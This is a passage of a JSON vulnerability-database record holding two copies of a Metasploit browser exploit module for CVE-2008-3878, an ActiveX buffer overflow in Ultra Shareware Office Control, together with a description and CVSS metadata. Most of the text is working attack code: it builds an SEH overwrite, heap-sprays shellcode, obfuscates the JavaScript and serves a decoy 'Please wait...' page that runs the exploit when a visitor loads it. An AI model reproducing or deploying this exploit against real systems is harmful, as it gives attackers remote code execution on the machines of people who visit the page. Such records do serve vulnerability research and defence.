0x220118c2 # p/p/r in OfficeCtrl.ocx\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 27 2008'))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# ActiveX parameters\r\n\t\tprogid = \"Ultra.OfficeControl\"\r\n\t\tclsid = \"00989888-BB72-4E31-A7C6-5F819C24D2F7\"\r\n\r\n\t\t# Set parameters\r\n\t\tfnname = rand_text_alpha(8+rand(8))\r\n\t\targ1 = rand_text_alphanumeric(128)\r\n\t\targ2 = rand_text_alphanumeric(4096) * 10\r\n\t\tseh_offset = 252\r\n\r\n\t\t# Build the exploit buffer\r\n\t\tsploit = rand_text_alphanumeric(seh_offset)\r\n\t\tsploit << generate_seh_record(target.ret)\r\n\r\n\t\t# Encode variables\r\n\t\tsploit = Rex::Text.to_hex(sploit, '%')\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Prepare the heap spray parameters\r\n\t\tspray_addr = target.ret\r\n\t\tspray_num = \"0x%x\" % spray_addr\r\n\r\n\t\t# Generate the final javascript\r\n\t\tjs = %Q|\r\nfunction #{fnname}()\r\n{\r\ntry {\r\nvar obj = new ActiveXObject(\"#{progid}\");\r\nvar my_unescape = unescape;\r\nvar shellcode = '#{shellcode}';\r\n#{js_heap_spray}\r\nsprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);\r\nvar arg1 = my_unescape(\"#{arg1}\");\r\nvar arg2 = my_unescape(\"#{arg2}\");\r\nvar sploit = my_unescape(\"#{sploit}\");\r\nobj.HttpUpload(arg1, arg2, sploit);\r\n} catch( e ) { window.location = 'about:blank' ; }\r\n}\r\n|\r\n\r\n\t\t# Obfuscate the javascript\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.obfuscate()\r\n\r\n\t\t# Build the final HTML\r\n\t\tcontent = %Q|<html>\r\n<head>\r\n<script language=javascript>\r\n#{js}\r\n</script>\r\n</head>\r\n<body 
onload=\"#{fnname}()\">\r\nPlease wait...\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16513/"}], "metasploit": [{"lastseen": "2020-03-15T18:11:37", "description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office Control. When processing the 'HttpUpload' method, the arguments are concatenated together to form a command line to run a bundled version of cURL. If the command fails to run, a stack-based buffer overflow occurs when building the error message. This is due to the use of sprintf() without proper bounds checking. NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.\n", "published": "2010-03-04T06:19:37", "type": "metasploit", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3878"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ULTRAOFFICE_HTTPUPLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. 
If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'shinnai', 'jduck' ],\n 'References' =>\n [\n [ 'CVE', '2008-3878' ],\n [ 'OSVDB', '47866' ],\n [ 'BID', '30861' ],\n [ 'EDB', '6318' ]\n ],\n 'Payload' =>\n {\n 'Space' => 4096,\n 'BadChars' => \"\\x00\",\n # For HttpUpload args: \"\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested with ActiveX v2.0.0.1020 and v2.0.2008.801\n [ 'Windows Universal',\n {\n 'Ret' => 0x0c0c0c0c # heap sprayed\n # 0x746C15A9 # p/p/r in msls31.dll\n # EEK, Safe SEH! 0x220118c2 # p/p/r in OfficeCtrl.ocx\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 27 2008'))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n\n # ActiveX parameters\n progid = \"Ultra.OfficeControl\"\n clsid = \"00989888-BB72-4E31-A7C6-5F819C24D2F7\"\n\n # Set parameters\n fnname = rand_text_alpha(8+rand(8))\n arg1 = rand_text_alphanumeric(128)\n arg2 = rand_text_alphanumeric(4096) * 10\n seh_offset = 252\n\n # Build the exploit buffer\n sploit = rand_text_alphanumeric(seh_offset)\n sploit << generate_seh_record(target.ret)\n\n # Encode variables\n sploit = Rex::Text.to_hex(sploit, '%')\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Prepare the heap spray parameters\n spray_addr = target.ret\n spray_num = \"0x%x\" % spray_addr\n\n # Generate the final javascript\n js = %Q|\nfunction #{fnname}()\n{\ntry {\nvar obj = new ActiveXObject(\"#{progid}\");\nvar my_unescape = unescape;\nvar shellcode = 
'#{shellcode}';\n#{js_heap_spray}\nsprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);\nvar arg1 = my_unescape(\"#{arg1}\");\nvar arg2 = my_unescape(\"#{arg2}\");\nvar sploit = my_unescape(\"#{sploit}\");\nobj.HttpUpload(arg1, arg2, sploit);\n} catch( e ) { window.location = 'about:blank' ; }\n}\n|\n\n # Obfuscate the javascript\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.obfuscate(memory_sensitive: true)\n\n # Build the final HTML\n content = %Q|<html>\n<head>\n<script language=javascript>\n#{js}\n</script>\n</head>\n<body onload=\"#{fnname}()\">\nPlease wait...\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n send_response_html(cli, content)\n\n handler(cli)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ultraoffice_httpupload.rb"}]}